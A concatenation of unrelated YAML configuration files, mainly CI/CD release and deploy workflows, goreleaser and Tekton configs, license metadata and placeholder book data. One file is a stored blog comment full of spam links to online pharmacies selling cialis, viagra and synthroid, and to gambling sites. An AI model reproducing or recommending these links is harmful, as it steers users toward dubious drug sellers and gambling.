url: ansible-aks-configure-kubenet-networking.md
- text: RBAC-rollen in AKS-cluster configureren
url: ansible-aks-configure-rbac.md
|
articles/ansible/index.yml
|
name: Build And Deploy

on:
  push:
    tags:
      - 'v*'

jobs:
  build-and-deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Set up Go
        uses: actions/setup-go@master
        with:
          go-version: 1.14
      - name: Set up Node
        uses: actions/setup-node@master
      - name: Check out code
        uses: actions/checkout@master
      - name: Build
        run: |
          make build_server
          make build_client
          tar -zcvf release.tgz output
      - name: Create release
        id: create_release
        uses: actions/create-release@master
        env:
          GITHUB_TOKEN: ${{ secrets.TOKEN }}
        with:
          tag_name: ${{ github.ref }}
          release_name: Release ${{ github.ref }}
          draft: false
          prerelease: false
      - name: Upload release asset
        uses: actions/upload-release-asset@master
        env:
          GITHUB_TOKEN: ${{ secrets.TOKEN }}
        with:
          upload_url: ${{ steps.create_release.outputs.upload_url }}
          asset_path: ./release.tgz
          asset_name: release.tgz
          asset_content_type: application/x-tgz
      - name: Deploy
        uses: appleboy/ssh-action@master
        with:
          host: ${{ secrets.HOST }}
          username: ${{ secrets.USERNAME }}
          password: ${{ secrets.PASSWORD }}
          command_timeout: 30m
          script: |
            mkdir -p ~/release
            mkdir -p ~/chaosi/server/daily-problem
            mkdir -p /usr/local/nginx/html/daily-problem
            cd ~/release
            # Retry the download up to 10 times: the release asset may not be
            # available immediately after the release step finishes.
            i=0
            while :
            do
              # Was `--no-check-certificate http://...`: download over HTTPS and
              # let wget verify the certificate instead of disabling the check.
              wget https://github.com/chaosi-zju/daily-problem/releases/latest/download/release.tgz -O daily-problem.tgz
              (( i++ ))
              # Treat anything <= 100 bytes as a failed/placeholder download.
              if [ `ls -l daily-problem.tgz | awk '{print $5}'` -gt 100 ]; then break;
              elif [ $i -gt 10 ]; then exit 1;
              fi
            done
            tar -zxvf daily-problem.tgz
            systemctl disable daily_problem.service
            systemctl stop daily_problem.service
            systemctl disable note.service
            systemctl stop note.service
            cp -rf output/server/* ~/chaosi/server/daily-problem/
            cp -rf output/dist/* /usr/local/nginx/html/daily-problem/
            cp -rf output/daily_problem.service /etc/systemd/system/
            cp -rf output/note ~/chaosi/server/
            cp -rf output/note.service /etc/systemd/system/
            export MYSQL_HOST=${{ secrets.MYSQL_HOST }} MYSQL_USER=${{ secrets.MYSQL_USER }} MYSQL_PASSWD=${{ secrets.MYSQL_PASSWD }}
            cd ~/chaosi/server/daily-problem && envsubst < config_prod_temp.yaml > config_prod.yaml && cd -
            systemctl enable daily_problem.service
            systemctl start daily_problem.service
            systemctl enable note.service
            systemctl start note.service
            # Typo fix: was `if [ -d outout ]`, which never matched, so the
            # extracted output directory was never cleaned up.
            if [ -d output ]; then rm -r output; fi
            systemctl status daily_problem.service | grep -C 20 "Active: active (running)"
            if [ $? == 0 ]; then exit 0; else exit 1; fi
|
.github/workflows/deploy.yml
|
title: Designing Database Solutions for Microsoft SQL Server
metadata:
title: 'Exam 70-465: Designing Database Solutions for Microsoft SQL Server'
description: 'Exam 70-465: Designing Database Solutions for Microsoft SQL Server'
uid: exam.70-465
displayName: 70-465
summary: |-
<div><font color='red'><strong>Questo esame è stato rimosso il 31 gennaio 2021. Per le opzioni attualmente disponibili, consulta <a href='/learn/certifications/browse/?resource_type=examination'>Pagina Esplora le Certificazioni e gli Esami</a>.<br/><br/></strong></font></div>
Questo esame è rivolto ai professionisti esperti in database che progettano e sviluppano soluzioni database all’interno dell'azienda. Sono responsabili della creazione di piani e progettazioni per la struttura del database, l'archiviazione, gli oggetti e i server. Creano il piano per l'ambiente in cui viene eseguita la soluzione database.
<div style='font-weight: bold;'><br/>Dal 18 febbraio 2016, questo esame include anche contenuti riferiti sia a SQL Server 2012 che SQL Server 2014. Si noti che questo esame non include domande su funzioni o funzionalità presenti solo in SQL Server 2012. Per ulteriori informazioni, si prega di <a href="https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4tLUO">scaricare e rivedere questo documento</a>.</div>
subTitle: Questo esame è rivolto ai professionisti esperti in database che progettano e sviluppano soluzioni database all’interno dell'azienda. Sono responsabili della creazione di piani e progettazioni per la struttura del database, l'archiviazione, gli oggetti e i server. Creano il piano per l'ambiente in cui viene eseguita la soluzione database.
iconUrl: /media/learn/certification/badges/certification-exam.svg
pdfDownloadUrl: https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4t560
locales:
- en
- zh-cn
- fr
- de
- ja
- pt-br
levels:
- advanced
skills:
- Progettare la struttura di un database (25-30%)
- Progettare database e oggetti database (30-35%)
- Progettare la sicurezza di un database (10-15%)
- Progettare una risoluzione dei problemi e ottimizzare la soluzione (25-30%)
retirementDate: 01/31/2021
roles:
- data-engineer
products:
- sql-server
courses:
- uid: course.20465
relatedCertifications:
- related:
uid: certification.mcse-data-management-analytics
resources:
- title: Exam Replay
description: Scopri due grandi offerte che ti aiutano a migliorare le tue probabilità di successo.
href: ../deals.md
- title: Dashboard delle certificazioni
description: Rivedi e gestisci gli appuntamenti programmati, i certificati e le trascrizioni.
href: https://www.microsoft.com/learning/dashboard.aspx
- title: Richiedere una sistemazione
description: Scopri come richiedere una sistemazione particolare per il tuo esame.
href: ../request-accommodations.md
- title: Criteri dell’esame e domande frequenti
description: Rivedi e gestisci gli appuntamenti programmati, i certificati e le trascrizioni.
href: ../certification-exam-policies.md
|
learn-certs-pr/exams/70-465.yml
|
---
name: amqp
version: 5.0.2
type: pipenv
summary: Low-level AMQP client for Python (fork of amqplib).
homepage: http://github.com/celery/py-amqp
license: other
licenses:
- sources: LICENSE
text: |
Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved.
Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved.
Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved.
Copyright (C) 2007-2008 <NAME> <<EMAIL>>. All rights reserved.
py-amqp is licensed under The BSD License (3 Clause, also known as
the new BSD license). The license is an OSI approved Open Source
license and is GPL-compatible(1).
The license text can also be found here:
http://www.opensource.org/licenses/BSD-3-Clause
License
=======
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Ask Solem, nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Footnotes
=========
(1) A GPL-compatible license makes it possible to
combine Celery with other software that is released
under the GPL, it does not mean that we're distributing
Celery under the GPL license. The BSD license, unlike the GPL,
let you distribute a modified version without making your
changes open source.
notices: []
|
cache/Odaikun/pipenv/amqp.dep.yml
|
# <NAME> - Murmur
- name: coming-soon
title: Murmur
author: <NAME>
index: E
thumbnail: eaves-murmur.jpg
publisher: CB Editions
pub-date: 1st Mar., 2018
extents: 177pp.
teaser: ""
# all other book data (in reverse chronological order by post date NOT pub date)
# <NAME> - Outline
- name: cusk-outline
title: Outline
author: <NAME>
index: C
thumbnail: cusk-outline.jpg
publisher: Faber & Faber
pub-date: 3rd May, 2018
extents: 256pp.
teaser: >
“Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.
Est tempor ea sunt enim excepteur adipisicing magna.
Elit aliquip nostrud duis qui pariatur laboris amet.
Ea adipisicing nisi commodo sint elit nostrud.”
- name: cusk-transit
title: Transit
author: <NAME>
index: C
thumbnail:
publisher: Faber & Faber
pub-date:
extents:
teaser: >
“Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.
Est tempor ea sunt enim excepteur adipisicing magna.
Elit aliquip nostrud duis qui pariatur laboris amet.
Ea adipisicing nisi commodo sint elit nostrud.”
# Benjamin Black - Prague Nights
- name: black-prague-nights
title: Prague Nights
author: <NAME>
index: B
thumbnail: black-prague-nights.jpg
publisher: Viking
pub-date: 1st Jun., 2017
extents: 366pp.
teaser: >
“Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
# <NAME> - Train Dreams
- name: johnson-train-dreams
title: Train Dreams
author: <NAME>
index: J
thumbnail: johnson-train-dreams.jpg
publisher: Granta
pub-date: 4th Jul., 2013
extents: 128pp.
teaser: >
“Ex voluptate commodo veniam nulla id aliqua aliqua sunt sunt eu exercitation dolor cillum aliquip.
Labore amet elit proident labore do ipsum qui.
Lorem sint non dolore anim labore ipsum mollit ipsum aliquip magna anim laborum.
Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
# <NAME> - Everything Under
- name: johnson-everything-under
title: Everything Under
author: <NAME>
index: J
thumbnail: johnson-everything-under.jpg
publisher: Vintage
pub-date: 7th Feb., 2019
extents: 272pp.
teaser: >
“Aliquip cillum non nisi sunt.
Anim nostrud tempor do dolor sint excepteur ea Lorem proident duis aliqua ipsum magna in.
In eiusmod ullamco sint ipsum tempor sint tempor ea.
Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
# <NAME> - Waiting for the Bullet
- name: d'arcy-waiting-for-the-bullet
title: Waiting for the Bullet
author: <NAME>
index: A
thumbnail: d'arcy-waiting-for-the-bullet.jpg
publisher: Doire Press
pub-date: 26th Mar., 2014
extents: 152pp.
teaser: >
“Aute nisi veniam elit deserunt cillum culpa aliquip.
Ipsum Lorem culpa aute irure laborum elit.
Irure deserunt amet minim duis ullamco est non.
Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
|
_data/book-data.yml
|
# goreleaser configuration: three Go binaries (FReD, FReD Proxy, ALExANDRA)
# published to the TU Berlin GitLab registry, each with its own Docker image.
gitlab_urls:
  api: https://git.tu-berlin.de/api/v4/
  download: https://git.tu-berlin.de

builds:
  - id: "FReD"
    main: ./cmd/frednode
    binary: fred
    env:
      - CGO_ENABLED=0
    goos:
      - linux
    goarch:
      - amd64
      - arm64
  - id: "FReD Proxy"
    main: ./cmd/fredproxy
    binary: fredproxy
    env:
      - CGO_ENABLED=0
    goos:
      - linux
    goarch:
      - amd64
      - arm64
  - id: "ALExANDRA"
    main: ./cmd/alexandra
    binary: alexandra
    env:
      - CGO_ENABLED=0
    goos:
      - linux
    goarch:
      - amd64
      - arm64

dockers:
  - ids:
      - FReD
    goos: linux
    goarch: amd64
    dockerfile: Dockerfile
    image_templates:
      - "git.tu-berlin.de:5000/mcc-fred/fred/fred:{{ .Tag }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/fred:v{{ .Major }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/fred:v{{ .Major }}.{{ .Minor }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/fred:latest"
    extra_files:
      - pkg/
      - cmd/
      - proto/
      - go.mod
      - go.sum
  - ids:
      - FReD Proxy
    goos: linux
    goarch: amd64
    dockerfile: proxy.Dockerfile
    image_templates:
      - "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:{{ .Tag }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:v{{ .Major }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:v{{ .Major }}.{{ .Minor }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:latest"
    extra_files:
      - pkg/
      - cmd/
      - proto/
      - go.mod
      - go.sum
  - ids:
      # Must match the build id exactly: was "ALeXANDRA" (wrong case), which
      # matches no build, leaving this image without a binary.
      - ALExANDRA
    goos: linux
    goarch: amd64
    dockerfile: alexandra.Dockerfile
    image_templates:
      - "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:{{ .Tag }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:v{{ .Major }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:v{{ .Major }}.{{ .Minor }}"
      - "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:latest"
    extra_files:
      - pkg/
      - cmd/
      - proto/
      - go.mod
      - go.sum
|
.goreleaser.yml
|
name: release-n-deploy

on:
  push:
    tags:
      - "v*.*" # Trigger on push with tags matching a version, e.g.: v1.0, v0.1.5

jobs:
  release:
    name: Create Release
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2
      # We need the whole history so we can later generate the release notes from the commit logs
      - name: Fetch all history for all tags and branches
        run: git fetch --prune --unshallow
      # Generate draft release notes by taking the commit logs between this release and the previous
      - name: Generate draft release notes
        id: release_notes
        run: |
          # Get the whole commit log with a pretty and easy to post-process format
          notes="$(git log --pretty=format:' -%d%Creset %s' --abbrev-commit)"
          # Get commit logs between this tag and the previous one
          notes="$(awk '/tag: v/ { flag=!flag; count+=1; next } flag && count < 2 {print}' <<< "$notes")"
          # Remove all merge commits for a cleaner log
          notes="$(sed '/Merge pull request #/d' <<< "$notes")"
          # `::set-output` is deprecated and disabled on current runners; write
          # the multiline value to $GITHUB_OUTPUT with a heredoc delimiter
          # instead (this also removes the need for the old %25/%0A/%0D escaping).
          {
            echo "content<<NOTES_EOF"
            echo "$notes"
            echo "NOTES_EOF"
          } >> "$GITHUB_OUTPUT"
      - name: Create draft release
        uses: actions/create-release@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          tag_name: ${{ github.ref }}
          release_name: Release ${{ github.ref }}
          body: |
            Release notes:
            ${{ steps.release_notes.outputs.content }}
          draft: true
          prerelease: false

  deploy:
    name: Deploy to PyPI
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2
      - name: Set up Python
        uses: actions/setup-python@v1
        with:
          python-version: "3.x"
      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install setuptools wheel
      - name: Build
        run: python setup.py sdist bdist_wheel
      - name: Publish package to PyPI
        uses: pypa/gh-action-pypi-publish@v1.1.0
        with:
          user: __token__
          password: ${{ secrets.pypi_password }}
.github/workflows/release_n_deploy.yml
|
name: Publish Docker Package
on:
push:
tags:
- 'v*'
jobs:
on-success:
needs: publish
runs-on: ubuntu-latest
if: ${{ always() && needs.publish.result == 'success' }}
steps:
- name: Notification Feishu
uses: whatwewant/action-robot-feishu@v0.0.13
with:
url: ${{ secrets.DOCKER_VERSION_FEISHU_BOT_WEBHOOK_URL }}
title: '✅ Docker 发布:${{ github.repository }}'
text: |
分支: ${{ github.ref }}
提交信息: ${{ github.event.head_commit.message }}
提交人: ${{ github.actor }}
            状态: 构建成功(https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }})
on-failure:
needs: publish
runs-on: ubuntu-latest
if: ${{ always() && needs.publish.result == 'failure' }}
steps:
- name: Notification Feishu
uses: whatwewant/action-robot-feishu@v0.0.13
with:
url: ${{ secrets.DOCKER_VERSION_FEISHU_BOT_WEBHOOK_URL }}
title: '❌ Docker 发布:${{ github.repository }}'
text: |
分支: ${{ github.ref }}
提交信息: ${{ github.event.head_commit.message }}
提交人: ${{ github.actor }}
            状态: 构建失败(https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }})
publish:
runs-on: ubuntu-latest
steps:
- name: Get Current Date
id: date
run: echo "::set-output name=date::$(date +'%Y-%m-%d')"
- uses: actions/checkout@v2
with:
fetch-depth: '0'
# - name: Docker meta
# id: meta
# uses: docker/metadata-action@v3
# with:
# # Custom Image: https://github.com/docker/metadata-action#inputs
# # images: whatwewant/zmicro,ghcr.io/whatwewant/zmicro
# images: whatwewant/zmicro
# tags: |
# type=ref,event=branch
# type=semver,pattern=v{{version}}
# type=semver,pattern=v{{major}}
# type=semver,pattern=v{{major}}.{{minor}}
- name: Docker Meta
id: meta
run: |
IMAGE_VERSION=$(echo ${GITHUB_REF} | sed -e "s%refs/tags/%%g")
IMAGE_NAME=${ACTION_IMAGE_NAMESPACE}/${ACTION_IMAGE_NAME}
IMAGE_TAGS=${IMAGE_NAME}:${IMAGE_VERSION}
echo "IMAGE_TAGS: ${IMAGE_TAGS}"
echo "::set-output name=version::${IMAGE_VERSION}"
echo "::set-output name=name::${IMAGE_NAME}"
echo "::set-output name=tags::${IMAGE_TAGS}"
shell: bash
env:
ACTION_IMAGE_NAMESPACE: whatwewant
ACTION_IMAGE_NAME: zmicro
- name: Show Docker Tags
run: |
echo "Docker Tags: ${{ steps.meta.outputs.tags }}"
- name: Set up QEMU
uses: docker/setup-qemu-action@v1
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v1
- name: Login to DockerHub
if: github.event_name != 'pull_request'
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
# - name: Login to GHCR
# if: github.event_name != 'pull_request'
# uses: docker/login-action@v1
# with:
# registry: ghcr.io
# username: ${{ github.repository_owner }}
# password: ${{ secrets.GITHUB_TOKEN }}
- name: Build and push
uses: docker/build-push-action@v2
with:
build-args: |
VERSION=${{ steps.meta.outputs.version }}
context: .
push: ${{ github.event_name != 'pull_request' }}
cache-from: type=registry,ref=${{ steps.meta.outputs.name }}:buildcache
cache-to: type=registry,ref=${{ steps.meta.outputs.name }}:buildcache,mode=max
tags: ${{ steps.meta.outputs.tags }}
labels: ${{ steps.meta.outputs.labels }}
platforms: linux/amd64,linux/arm64,linux/arm/v7
|
.github/workflows/publish.yml
|
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: gitlab-set-environment
labels:
app.kubernetes.io/version: "0.1"
annotations:
tekton.dev/pipelines.minVersion: "0.12.1"
tekton.dev/categories: Git
tekton.dev/tags: gitlab, git
tekton.dev/displayName: "Set Gitlab commit environment"
tekton.dev/platforms: "linux/amd64"
spec:
description: >-
This task creates or updates an environment within a gitlab project.
params:
- name: GITLAB_HOST_URL
description: |
The GitLab host, adjust this if you run a GitLab enterprise.
default: "https://gitlab.com"
type: string
- name: REPO_FULL_NAME
description: |
The GitLab repository full name, e.g.: codecentric/tekton-catalog
type: string
- name: GITLAB_TOKEN_SECRET_NAME
description: |
The name of the kubernetes secret that contains the GitLab token, default: gitlab-api-secret
type: string
default: gitlab-api-secret
- name: GITLAB_TOKEN_SECRET_KEY
description: |
The key within the kubernetes secret that contains the GitLab token, default: token
type: string
default: token
- name: ENVIRONMENT_NAME
description: |
Name of the environment
type: string
default: main
- name: ENVIRONMENT_URL
description: |
The target URL to associate with the environment.
type: string
default: https://codecentric.de
steps:
- name: set-environment
image: ghcr.io/marcopaga/tekton-task-gitlab-set-environment:f44b459
env:
- name: GITLAB_HOST_URL
value: $(params.GITLAB_HOST_URL)
- name: REPO_FULL_NAME
value: $(params.REPO_FULL_NAME)
- name: GITLAB_TOKEN
valueFrom:
secretKeyRef:
name: $(params.GITLAB_TOKEN_SECRET_NAME)
key: $(params.GITLAB_TOKEN_SECRET_KEY)
- name: ENVIRONMENT_NAME
value: $(params.ENVIRONMENT_NAME)
- name: ENVIRONMENT_URL
value: $(params.ENVIRONMENT_URL)
|
task/gitlab-set-environment/0.1/gitlab-set-environment.yaml
|
_id: 28e1ae30-2b23-11ea-b64a-9bced634a8a3
message: >-
Coronoid: sch.abtg.hashtafak.github.io.tda.dn myself successful creatinine,
[URL=http://casino-bonusgambling.space/]biggest gambling guide[/URL]
[URL=http://michiganvacantproperty.org/synthroid/]synthroid[/URL] synthroid
[URL=http://fbwhatsapquotes.com/canadian-pharmacy-online/]pharmacy[/URL]
[URL=http://casatheodoro.com/liv-52/]order liv.52 online[/URL]
[URL=http://oliveogrill.com/on-line-pharmacy/]canadian pharmacy cialis
20mg[/URL] [URL=http://trucknoww.com/cialis-edrugstore/]cialis
edrugstore[/URL] [URL=http://gormangreen.com/drug/cialis/]cialis[/URL]
[URL=http://center4family.com/www-viagra-com/]viagra[/URL]
[URL=http://oliveogrill.com/tadalafil/]cialis[/URL] antacids <a
href="http://casino-bonusgambling.space/">online gambling strategy</a>
gambling online rules <a
href="http://michiganvacantproperty.org/synthroid/">buy levothyroxine
online</a> <a
href="http://fbwhatsapquotes.com/canadian-pharmacy-online/">canadian pharmacy
online</a> pharmacy <a href="http://casatheodoro.com/liv-52/">order liv.52
online</a> <a href="http://oliveogrill.com/on-line-pharmacy/">canadian
pharmacy</a> <a href="http://trucknoww.com/cialis-edrugstore/">cialis 20mg
price at walmart</a> <a href="http://gormangreen.com/drug/cialis/">generic
cialis lowest price</a> <a
href="http://center4family.com/www-viagra-com/">viagra</a> <a
href="http://oliveogrill.com/tadalafil/">generic cialis canada</a> heater
procedure, http://casino-bonusgambling.space/ gambling online bonuses
http://michiganvacantproperty.org/synthroid/ levothyroxine
http://fbwhatsapquotes.com/canadian-pharmacy-online/ pharmacy
http://casatheodoro.com/liv-52/ liv.52 pills liv.52 pills
http://oliveogrill.com/on-line-pharmacy/ on line pharmacy
http://trucknoww.com/cialis-edrugstore/ cialis alternative
http://gormangreen.com/drug/cialis/ cialis
http://center4family.com/www-viagra-com/ viagra
http://oliveogrill.com/tadalafil/ order cialis photoreceptor fevers.
name: asubsetume
email: 4db91a86514a9a4573719ad584f04e6c
url: 'http://casino-bonusgambling.space/'
hidden: ''
date: '2019-12-30T16:41:00.235Z'
|
_data/comments/dear-diary/comment-1577724060236.yml
|
image: google/dart:latest
cache:
untracked: true
  key: "$CI_COMMIT_REF_NAME"
paths:
- packages/
- web/packages/
- .pub_cache/
stages:
- build
- test
- publish
before_script:
- export PUB_CACHE=$PWD/.pub_cache/
- pub version
- pub get
- pub upgrade
analyze:
stage: build
script:
- dartanalyzer lib example test
test:
stage: test
script:
- pub run test
- pub run test_coverage --min-coverage=90
tags:
- docker
#dry-run:
# stage: publish
# script:
# - pub get
# - pub publish --dry-run
# only:
# - master
pub-dev:
stage: publish
script:
- |
if [ -z "${PUB_DEV_PUBLISH_ACCESS_TOKEN}" ]; then
echo "Missing PUB_DEV_PUBLISH_ACCESS_TOKEN environment variable"
exit 1
fi
if [ -z "${PUB_DEV_PUBLISH_REFRESH_TOKEN}" ]; then
echo "Missing PUB_DEV_PUBLISH_REFRESH_TOKEN environment variable"
exit 1
fi
if [ -z "${PUB_DEV_PUBLISH_TOKEN_ENDPOINT}" ]; then
echo "Missing PUB_DEV_PUBLISH_TOKEN_ENDPOINT environment variable"
exit 1
fi
if [ -z "${PUB_DEV_PUBLISH_EXPIRATION}" ]; then
echo "Missing PUB_DEV_PUBLISH_EXPIRATION environment variable"
exit 1
fi
      if [ ! -d "$HOME/.pub-cache" ]; then
        mkdir "$HOME/.pub-cache"
      fi
cat <<EOF > .pub_cache/credentials.json
{
"accessToken":"$(echo "${PUB_DEV_PUBLISH_ACCESS_TOKEN}" | base64 -d)",
"refreshToken":"$(echo "${PUB_DEV_PUBLISH_REFRESH_TOKEN}" | base64 -d)",
"tokenEndpoint":"${PUB_DEV_PUBLISH_TOKEN_ENDPOINT}",
"scopes":["https://www.googleapis.com/auth/userinfo.email","openid"],
"expiration":${PUB_DEV_PUBLISH_EXPIRATION}
}
EOF
- pub get
- pub publish -f
only:
- master
#tag:
# image: docker:stable
# services:
# - docker:stable-dind
# stage: publish
# script:
# - |
# if [ -z "${GITLAB_API_TOKEN}" ]; then
# echo "Missing GITLAB_API_TOKEN environment variable"
# exit 1
# fi
#
# export TAG_NAME="$(awk '/^version: /{print $NF}' pubspec.yaml)"
# docker run --rm curlimages/curl --fail --request POST --header "PRIVATE-TOKEN: ${GITLAB_API_TOKEN}" \
# --data-urlencode "tag_name=v${TAG_NAME}" \
# --data-urlencode "ref=master" \
# --data-urlencode "release_description=Check the [CHANGELOG.md](/CHANGELOG.md)" \
# "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/repository/tags"
# environment:
# name: pub-dev
# url: https://pub.dev/packages/dart_inject
# only:
# - master
|
.gitlab-ci.yml
|
homepage: ''
changelog-type: markdown
hash: 4a12b0a9a161563a8475d87d8cf21367868a8a5bda62b6af6b9932707f94b4a8
test-bench-deps:
tasty-smallcheck: -any
base: ! '>=4.7 && <5'
tasty-discover: -any
setoid: -any
smallcheck: -any
containers: ! '>=0.5 && <0.6'
tasty-quickcheck: -any
mtl: -any
tasty-hunit: -any
tasty: -any
maintainer: <EMAIL>
synopsis: A Haskell implementation of setoid
changelog: ! '# Revision history for setoid
## 0.1.0.0 -- 2017-01-17
* Initial extract of Setoid into a standalone library
'
basic-deps:
base: ! '>=4.7 && <5'
containers: ! '>=0.5 && <0.6'
all-versions:
- 0.1.0.0
author: <NAME>
latest: 0.1.0.0
description-type: markdown
description: ! "# Setoid\n\nA Haskell implementation of [setoid](https://en.wikipedia.org/wiki/Setoid)
- a\nset equipped with an equivalence relation. Setoid is a useful data structure
in\ncases where equivalence is chosen not to be equality. One can use it to\ninfluence
the memberships of the elements more strictly, as opposed to sets, and\nrun computations
on unions when conflicts between elements are found.\n\nFor more in-depth explanations
and examples, please have a look at the\ndocumentation on hackage.\n\n### Copyright:\n*
[Global Access Internet Services GmbH](http://www.global.de)\n\n### Authors:\n*
[<NAME>](https://github.com/ptek)\n* [<NAME>](https://github.com/pzel)\n*
[<NAME>](https://github.com/irekjozwiak) - Author of the predecessor\n implementation
of sets wich stricter guarantees and the idea of Setoid in\n Haskell.\n\n## License\n\n```text\n
\ Copyright (c) 2017, Global Access Internet Services GmbH\n \n All rights
reserved.\n \n Redistribution and use in source and binary forms, with or
without\n modification, are permitted provided that the following conditions
are met:\n \n * Redistributions of source code must retain the above copyright
notice,\n this list of conditions and the following disclaimer.\n \n
\ * Redistributions in binary form must reproduce the above copyright\n notice,
this list of conditions and the following disclaimer in the\n documentation
and/or other materials provided with the distribution.\n \n * Neither
the name of Global Access Internet Services GmbH nor the names\n of other
contributors may be used to endorse or promote products\n derived from
this software without specific prior written permission.\n \n THIS SOFTWARE
IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS
OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n ARE DISCLAIMED. IN
NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE\n POSSIBILITY OF SUCH DAMAGE.\n```\n"
license-name: BSD-3-Clause
|
packages/se/setoid.yaml
|
name: testing
on:
pull_request:
push:
branches:
- main
jobs:
live-sandbox-cli:
runs-on: ubuntu-latest
steps:
- name: get a copy of the repo contents
uses: actions/checkout@v2
- name: install the project's dependencies
run: npm install
- name: generate a distributable tarball
run: npm run all
- name: install the cli from the tarball
run: sudo npm install -g zenodraft-*.tgz
- name: create a new directory to do the testing in
run: mkdir testing && cd testing
- name: test creating a new draft deposition in a new collection on zenodo sandbox
id: get_record_id
env:
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
RECORD_ID=$(zenodraft --sandbox deposition create in-new-collection)
echo "::set-output name=record_id::$RECORD_ID"
- name: test showing the complete details for the draft deposition
id: get_concept_record_id
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
